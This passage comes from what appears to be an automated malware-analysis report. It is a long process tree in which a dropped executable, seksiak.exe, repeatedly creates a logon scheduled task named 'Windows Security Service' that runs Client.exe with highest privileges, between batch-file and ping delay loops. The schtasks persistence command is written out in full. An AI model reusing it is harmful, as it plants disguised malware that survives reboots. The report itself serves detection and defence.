- Scheduled Task/Job: Scheduled Task
PID:540
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\U0nzZWUkzTRW.bat" "27⤵PID:1368
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:4344
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:716
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"28⤵
- Executes dropped EXE
PID:5600 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f29⤵PID:2960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xHsQlqupsRbu.bat" "29⤵PID:5584
-
C:\Windows\system32\chcp.comchcp 6500130⤵PID:5296
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost30⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:916
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"30⤵
- Executes dropped EXE
PID:6084 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f31⤵
- Scheduled Task/Job: Scheduled Task
PID:1148
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\t5WlAQEA40Z7.bat" "31⤵PID:3576
-
C:\Windows\system32\chcp.comchcp 6500132⤵PID:5060
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost32⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6060
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"32⤵
- Executes dropped EXE
PID:960 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f33⤵
- Scheduled Task/Job: Scheduled Task
PID:5492
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CeBSe8cKjL1k.bat" "33⤵PID:5668
-
C:\Windows\system32\chcp.comchcp 6500134⤵PID:1220
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4876
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"34⤵
- Executes dropped EXE
PID:1660 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f35⤵
- Scheduled Task/Job: Scheduled Task
PID:2392
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oOUFXPhcprCA.bat" "35⤵PID:3508
-
C:\Windows\system32\chcp.comchcp 6500136⤵PID:2984
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost36⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5604
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"36⤵
- Executes dropped EXE
PID:5504 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f37⤵
- Scheduled Task/Job: Scheduled Task
PID:2332
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sGIxFMiTUlsw.bat" "37⤵PID:1620
-
C:\Windows\system32\chcp.comchcp 6500138⤵PID:6040
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost38⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4364
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"38⤵
- Executes dropped EXE
PID:3188 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f39⤵
- Scheduled Task/Job: Scheduled Task
PID:3256
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zlowUPSnD7cz.bat" "39⤵PID:4016
-
C:\Windows\system32\chcp.comchcp 6500140⤵PID:4880
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost40⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3108
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"40⤵
- Executes dropped EXE
PID:460 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f41⤵
- Scheduled Task/Job: Scheduled Task
PID:1284
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RDRTawZnQz3e.bat" "41⤵PID:4744
-
C:\Windows\system32\chcp.comchcp 6500142⤵PID:5592
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost42⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1272
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"42⤵
- Executes dropped EXE
PID:4780 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f43⤵
- Scheduled Task/Job: Scheduled Task
PID:3300
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2hmZ55XTH5hs.bat" "43⤵PID:5152
-
C:\Windows\system32\chcp.comchcp 6500144⤵PID:4560
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost44⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5404
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"44⤵
- Executes dropped EXE
PID:332 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f45⤵
- Scheduled Task/Job: Scheduled Task
PID:4544
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F5dNaTPXOhK8.bat" "45⤵PID:4612
-
C:\Windows\system32\chcp.comchcp 6500146⤵PID:3732
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost46⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1996
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"46⤵
- Executes dropped EXE
PID:5124 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f47⤵PID:3792
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\j92FPJQiEfLA.bat" "47⤵PID:5856
-
C:\Windows\system32\chcp.comchcp 6500148⤵PID:2808
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost48⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4380
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"48⤵
- Executes dropped EXE
PID:5220 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f49⤵
- Scheduled Task/Job: Scheduled Task
PID:752
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IfntIeK7K0OI.bat" "49⤵PID:3788
-
C:\Windows\system32\chcp.comchcp 6500150⤵PID:2796
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost50⤵PID:2764
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"50⤵
- Executes dropped EXE
PID:3724 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f51⤵
- Scheduled Task/Job: Scheduled Task
PID:660
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E9h0xvR0ZVOG.bat" "51⤵PID:5504
-
C:\Windows\system32\chcp.comchcp 6500152⤵PID:4776
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost52⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:984
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"52⤵
- Executes dropped EXE
PID:5656 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f53⤵
- Scheduled Task/Job: Scheduled Task
PID:1540
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ukTWMDJ2jlji.bat" "53⤵PID:5164
-
C:\Windows\system32\chcp.comchcp 6500154⤵PID:2920
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost54⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1032
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"54⤵
- Executes dropped EXE
PID:764 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f55⤵
- Scheduled Task/Job: Scheduled Task
PID:4780
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Zi292U0gSBr5.bat" "55⤵PID:5524
-
C:\Windows\system32\chcp.comchcp 6500156⤵PID:4620
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost56⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3792
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"56⤵
- Executes dropped EXE
PID:2144 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f57⤵
- Scheduled Task/Job: Scheduled Task
PID:2360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xw3n4oRSixXu.bat" "57⤵PID:4572
-
C:\Windows\system32\chcp.comchcp 6500158⤵PID:3392
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost58⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5204
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"58⤵
- Executes dropped EXE
PID:4128 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f59⤵PID:4652
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\117var04G2S2.bat" "59⤵PID:5764
-
C:\Windows\system32\chcp.comchcp 6500160⤵PID:2244
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost60⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3524
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"60⤵PID:7928
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f61⤵
- Scheduled Task/Job: Scheduled Task
PID:7956
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dlSAVxCHR7EW.bat" "61⤵PID:8072
-
C:\Windows\system32\chcp.comchcp 6500162⤵PID:8116
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost62⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3468
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"62⤵PID:1036
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f63⤵
- Scheduled Task/Job: Scheduled Task
PID:5844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vJZXZI5Zf3DI.bat" "63⤵PID:1568
-
C:\Windows\system32\chcp.comchcp 6500164⤵PID:5700
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost64⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3780
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"64⤵PID:8360
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f65⤵
- Scheduled Task/Job: Scheduled Task
PID:5508
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Jv20D7mwrqNg.bat" "65⤵PID:8536
-
C:\Windows\system32\chcp.comchcp 6500166⤵PID:8200
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost66⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8220
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"66⤵PID:8860
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f67⤵
- Scheduled Task/Job: Scheduled Task
PID:6296
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mlzlPv9F5f7N.bat" "67⤵PID:8420
-
C:\Windows\system32\chcp.comchcp 6500168⤵PID:8468
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost68⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8480
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"68⤵PID:9060
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f69⤵
- Scheduled Task/Job: Scheduled Task
PID:3324
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QnzbAJSSPiqV.bat" "69⤵PID:2804
-
C:\Windows\system32\chcp.comchcp 6500170⤵PID:6196
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost70⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7268
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"70⤵PID:4776
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f71⤵PID:1260
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Y56e1ABN7ji1.bat" "71⤵PID:1660
-
C:\Windows\system32\chcp.comchcp 6500172⤵PID:1016
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost72⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2340
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"72⤵PID:5500
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f73⤵
- Scheduled Task/Job: Scheduled Task
PID:5864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Heif1AqFWQkc.bat" "73⤵PID:4356
-
C:\Windows\system32\chcp.comchcp 6500174⤵PID:2624
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost74⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3972
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"74⤵PID:5636
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f75⤵PID:5224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PxWKECGd4GQx.bat" "75⤵PID:6692
-
C:\Windows\system32\chcp.comchcp 6500176⤵PID:3392
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost76⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2144
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"76⤵PID:6260
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f77⤵
- Scheduled Task/Job: Scheduled Task
PID:6272
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fAkY9b9CoOF7.bat" "77⤵PID:6444
-
C:\Windows\system32\chcp.comchcp 6500178⤵PID:6572
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost78⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6612
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"78⤵PID:7036
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f79⤵
- Scheduled Task/Job: Scheduled Task
PID:7116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MXbOxb4NL3io.bat" "79⤵PID:2556
-
C:\Windows\system32\chcp.comchcp 6500180⤵PID:2040
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost80⤵
- Runs ping.exe
PID:5272
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"80⤵PID:5100
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f81⤵
- Scheduled Task/Job: Scheduled Task
PID:968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iJon8icQOKAl.bat" "81⤵PID:4388
-
C:\Windows\system32\chcp.comchcp 6500182⤵PID:4112
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost82⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3976
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"82⤵PID:5484
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f83⤵
- Scheduled Task/Job: Scheduled Task
PID:6640
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rreWRWtQraYj.bat" "83⤵PID:7632
-
C:\Windows\system32\chcp.comchcp 6500184⤵PID:7800
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost84⤵
- Runs ping.exe
PID:7788
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"84⤵PID:3732
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f85⤵
- Scheduled Task/Job: Scheduled Task
PID:4860
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uQ2wSSSk0I9a.bat" "85⤵PID:5324
-
C:\Windows\system32\chcp.comchcp 6500186⤵PID:8712
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost86⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4708
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"86⤵PID:4052
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f87⤵PID:1752
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MnLs6UdNuTcZ.bat" "87⤵PID:456
-
C:\Windows\system32\chcp.comchcp 6500188⤵PID:1504
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost88⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5988
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"88⤵PID:1216
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f89⤵
- Scheduled Task/Job: Scheduled Task
PID:6976
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QXve1ErGGKER.bat" "89⤵PID:200
-
C:\Windows\system32\chcp.comchcp 6500190⤵PID:1640
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost90⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5100
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"90⤵PID:1108
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f91⤵PID:5672
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jAvjMof5LnnA.bat" "91⤵PID:3720
-
C:\Windows\system32\chcp.comchcp 6500192⤵PID:2292
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost92⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5572
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"92⤵PID:5744
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f93⤵
- Scheduled Task/Job: Scheduled Task
PID:6692
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\f5q0EKtwDkV9.bat" "93⤵PID:6428
-
C:\Windows\system32\chcp.comchcp 6500194⤵PID:6420
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost94⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6596
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"94⤵PID:5868
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f95⤵
- Scheduled Task/Job: Scheduled Task
PID:1668
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LnTaKiByQZqE.bat" "95⤵PID:5384
-
C:\Windows\system32\chcp.comchcp 6500196⤵PID:8764
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost96⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5412
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"96⤵PID:3368
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f97⤵
- Scheduled Task/Job: Scheduled Task
PID:716
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3Wp48fB4lK1S.bat" "97⤵PID:8144
-
C:\Windows\system32\chcp.comchcp 6500198⤵PID:1104
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost98⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:952
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"98⤵PID:2852
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f99⤵
- Scheduled Task/Job: Scheduled Task
PID:8960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ry0j3uFfvXV6.bat" "99⤵PID:8904
-
C:\Windows\system32\chcp.comchcp 65001100⤵PID:9184
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost100⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3708
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"100⤵PID:7308
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f101⤵
- Scheduled Task/Job: Scheduled Task
PID:4064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h5GElEVs9Bzo.bat" "101⤵PID:5496
-
C:\Windows\system32\chcp.comchcp 65001102⤵PID:5532
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost102⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2796
-
-
